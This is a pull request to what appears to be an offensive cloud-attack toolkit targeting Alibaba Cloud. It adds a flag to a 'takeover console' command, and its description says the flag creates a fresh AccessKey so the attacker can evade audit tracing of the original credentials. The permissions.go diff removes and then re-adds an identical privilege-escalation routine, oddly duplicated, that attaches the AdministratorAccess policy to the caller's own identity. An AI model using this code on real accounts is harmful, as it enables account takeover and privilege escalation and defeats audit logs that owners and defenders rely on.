### PR TITLE
Enhanced TakeoverConsole function

### DIFF
--- a/cmd/alibaba/console.go
+++ b/cmd/alibaba/console.go
@@ -7,8 +7,9 @@ import (
 )
 
 var (
-	userName string
-	password string
+	userName  string
+	password  string
+	accessKey bool
 )
 
 func init() {
@@ -17,6 +18,7 @@ func init() {
 	consoleCmd.AddCommand(lsConsoleCmd)
 
 	consoleCmd.Flags().StringVarP(&userName, "userName", "u", "crossfire", "指定用户名 (Specify user name)")
+	consoleCmd.Flags().BoolVarP(&accessKey, "accessKey", "a", false, "创建AccessKey (Create AccessKey)")
 }
 
 var consoleCmd = &cobra.Command{
@@ -24,7 +26,7 @@ var consoleCmd = &cobra.Command{
 	Short: "一键接管控制台 (Takeover console)",
 	Long:  "一键接管控制台 (Takeover console)",
 	Run: func(cmd *cobra.Command, args []string) {
-		aliconsole.TakeoverConsole(userName)
+		aliconsole.TakeoverConsole(userName, accessKey)
 	},
 }
 

--- a/pkg/cloud/alibaba/aliram/permissions.go
+++ b/pkg/cloud/alibaba/aliram/permissions.go
@@ -18,7 +18,6 @@ import (
 	log "github.com/sirupsen/logrus"
 
 	"github.com/teamssix/cf/pkg/cloud"
-	"github.com/AlecAivazis/survey/v2"
 )
 
 var header = []string{"序号 (SN)", "策略名称 (PolicyName)", "描述 (Description)"}
@@ -100,34 +99,7 @@ func ListPermissions() {
 					case strings.Contains(o[1], "AliyunRDSReadOnlyAccess"):
 						data2 = appendData(rdslsAction, rdslsDescription)
 					case strings.Contains(o[1], "AliyunRAMFullAccess"):
-						var EvenPrivilege bool = false //判断是否已经提权过
-						for _, e := range data2 {
-							if e[1] == consoleAction {
-								EvenPrivilege = true
-							}	
-						}
-						if EvenPrivilege == false {
-							choose := []string{"Yes", "No"}
-							var choosePrivilege string
-							var result bool = false
-						    prompt := &survey.Select{
-						        Message: "检测到权限可提升，是否自动提权？ (Is the permission raised automatically?)",
-						        Options: choose,
-						    }
-						    survey.AskOne(prompt, &choosePrivilege)
-						    if choosePrivilege == "Yes" {
-						    	result = privilegePromotion()
-						    }
-						    if result == false || choosePrivilege == "No" {
-						    	data2 = appendData(consoleAction, consoleDescription)
-						    } else {
-						    	data2 = appendData(osslsAction, osslsDescription)
-								data2 = appendData(ecslsAction, ecslsDescription)
-								data2 = appendData(ecsexecAction, ecsexecDescription)
-								data2 = appendData(rdslsAction, rdslsDescription)
-								data2 = appendData(consoleAction, consoleDescription)
-						    }
-						}
+						data2 = appendData(consoleAction, consoleDescription)
 					}
 				}
 				if len(data2) == 0 {
@@ -245,19 +217,6 @@ func listGroupsForUser(userName string) []string {
 		groups = append(groups, g.GroupName)
 	}
 	return groups
-}
-
-func privilegePromotion() bool {
-	request := ram.CreateAttachPolicyToUserRequest()
-	request.Scheme = "https"
-	request.PolicyType = "System"
-	request.PolicyName = "AdministratorAccess"
-	request.UserName = getCallerIdentity()
-	_, err := RAMClient().AttachPolicyToUser(request)
-	if err != nil {
-		return false
-	}
-	return true
 }
 
 func traversalPermissions() ([][]string, [][]string) {

--- a/pkg/cloud/alibaba/aliram/permissions.go
+++ b/pkg/cloud/alibaba/aliram/permissions.go
@@ -18,6 +18,7 @@ import (
 	log "github.com/sirupsen/logrus"
 
 	"github.com/teamssix/cf/pkg/cloud"
+	"github.com/AlecAivazis/survey/v2"
 )
 
 var header = []string{"序号 (SN)", "策略名称 (PolicyName)", "描述 (Description)"}
@@ -99,7 +100,34 @@ func ListPermissions() {
 					case strings.Contains(o[1], "AliyunRDSReadOnlyAccess"):
 						data2 = appendData(rdslsAction, rdslsDescription)
 					case strings.Contains(o[1], "AliyunRAMFullAccess"):
-						data2 = appendData(consoleAction, consoleDescription)
+						var EvenPrivilege bool = false //判断是否已经提权过
+						for _, e := range data2 {
+							if e[1] == consoleAction {
+								EvenPrivilege = true
+							}	
+						}
+						if EvenPrivilege == false {
+							choose := []string{"Yes", "No"}
+							var choosePrivilege string
+							var result bool = false
+						    prompt := &survey.Select{
+						        Message: "检测到权限可提升，是否自动提权？ (Is the permission raised automatically?)",
+						        Options: choose,
+						    }
+						    survey.AskOne(prompt, &choosePrivilege)
+						    if choosePrivilege == "Yes" {
+						    	result = privilegePromotion()
+						    }
+						    if result == false || choosePrivilege == "No" {
+						    	data2 = appendData(consoleAction, consoleDescription)
+						    } else {
+						    	data2 = appendData(osslsAction, osslsDescription)
+								data2 = appendData(ecslsAction, ecslsDescription)
+								data2 = appendData(ecsexecAction, ecsexecDescription)
+								data2 = appendData(rdslsAction, rdslsDescription)
+								data2 = appendData(consoleAction, consoleDescription)
+						    }
+						}
 					}
 				}
 				if len(data2) == 0 {
@@ -217,6 +245,19 @@ func listGroupsForUser(userName string) []string {
 		groups = append(groups, g.GroupName)
 	}
 	return groups
+}
+
+func privilegePromotion() bool {
+	request := ram.CreateAttachPolicyToUserRequest()
+	request.Scheme = "https"
+	request.PolicyType = "System"
+	request.PolicyName = "AdministratorAccess"
+	request.UserName = getCallerIdentity()
+	_, err := RAMClient().AttachPolicyToUser(request)
+	if err != nil {
+		return false
+	}
+	return true
 }
 
 func traversalPermissions() ([][]string, [][]string) {


### PR DESCRIPTION
为控制台接管新增一个参数，该参数会使接管控制台时创建一个新的AKSK，可用于躲避原AKSK的accesskey审计溯源 (Add a parameter for the console takeover that causes the console takeover to create a new AKSK that can be used to evade the accesskey audit traceability of the original AKSK)